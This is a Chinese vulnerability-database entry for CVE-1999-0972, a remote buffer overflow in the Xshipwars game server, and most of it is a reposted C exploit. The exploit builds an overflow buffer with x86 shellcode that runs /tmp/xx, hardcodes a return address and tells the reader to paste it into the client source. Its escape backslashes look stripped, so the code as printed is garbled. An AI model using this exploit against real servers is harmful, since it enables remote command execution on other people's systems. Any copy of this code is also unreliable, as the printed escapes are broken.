Xshipwars缓冲区溢出漏洞

Xshipwars缓冲区溢出漏洞

漏洞ID 1105640 漏洞类型 缓冲区溢出
发布时间 1999-12-09 更新时间 2005-05-02
图片[1]-Xshipwars缓冲区溢出漏洞-安全小百科CVE编号 CVE-1999-0972
图片[2]-Xshipwars缓冲区溢出漏洞-安全小百科CNNVD-ID CNNVD-199912-041
漏洞平台 Multiple CVSS评分 7.5
|漏洞来源
https://www.exploit-db.com/exploits/19667
http://www.cnnvd.org.cn/web/xxk/ldxqById.tag?CNNVD=CNNVD-199912-041
|漏洞详情
Xshipwars的xsw程序存在缓冲区溢出漏洞。
|漏洞EXP
/*
source: http://www.securityfocus.com/bid/863/info

Xshipwars a graphical 'star battle' client/server based game which runs a variety of platforms. Certain versions of the server which facilitates this game (versions before 1.25) had a remotely exploitable buffer overflow. The exploit would result in the execution of arbitrary commands as the UID of the server process. 
*/

/* If the offset is off for your box, then the server will still crash,
 and will begin an endless loop of sending itself log messages,
 filling up whatever space it can on whatever partition it's installed
 on. This is less than optimal behavior, so quickly find and kill the
 server if your exploit fails. 

       Love,
       A. Woodward, Dec 1999

<cut this and paste it into your client's source file, modify your
.h's to raise the limit on a few variables (grep for 256 and turn them
into 2560), recompile, and enjoy> */

/*
 *	Sends a literal command.
 */
/*hacked to send our attack buffer!*/

int 
NetSendExec(char *arg)
{
  char larg[CS_MESG_MAX];
  char sndbuf[CS_DATA_MAX_LEN];
  char exploitbuf[CS_DATA_MAX_LEN];
  int i;

  /*test shellcode. No whitespace, just exec's /tmp/xx. If it's not
    there, does random things. Replace this for slightly more
    fun. ;> */
      char code[] ="xebx1fx5ex89x76x08x31xc0x88x46x07x89x46x0c"
	   "xb0x0bx89xf3x8dx4ex08x8dx56x0cxcdx80x31xdb"
	   "x89xd8x40xcdx80xe8xdcxffxffxff/tmp/xx";
	

	
#define SIZEOFBUF 229
	memset(exploitbuf,0x41,SIZEOFBUF);

#define SHELLSTART 50
	memcpy(exploitbuf+SHELLSTART,code,strlen(code));
	
	/*Return to: 0xbfffebe4 Your Kilometerage May Vary*/
	exploitbuf[132]=0xe4;
	exploitbuf[133]=0xeb;
	exploitbuf[134]=0xff;
	exploitbuf[135]=0xbf;
	
	exploitbuf[SIZEOFBUF-1]=0;

	/*
	if(arg == NULL)
	    return(-1);
	if(arg[0] == '')
	    return(-2);
	*/

	/*strncpy(larg, arg, CS_MESG_MAX);*/
	strncpy(larg, exploitbuf, CS_MESG_MAX);
	larg[CS_MESG_MAX - 1] = '';
	

        /* 
         *   NET_CMD_EXEC format is as follows:
         *
         *      argument
         */
        sprintf(sndbuf, "%i %sn",
                CS_CODE_LITERALCMD,
                larg
        );
        NetSendData(sndbuf);


	return(0);
}
|参考资料

来源:BID
名称:863
链接:http://www.securityfocus.com/bid/863

相关推荐: HP TruCluster Server Cluster Alias/NFS Denial of Service Vulnerability

HP TruCluster Server Cluster Alias/NFS Denial of Service Vulnerability 漏洞ID 1100451 漏洞类型 Unknown 发布时间 2003-04-22 更新时间 2003-04-22 C…

© 版权声明
THE END
喜欢就支持一下吧
点赞0
分享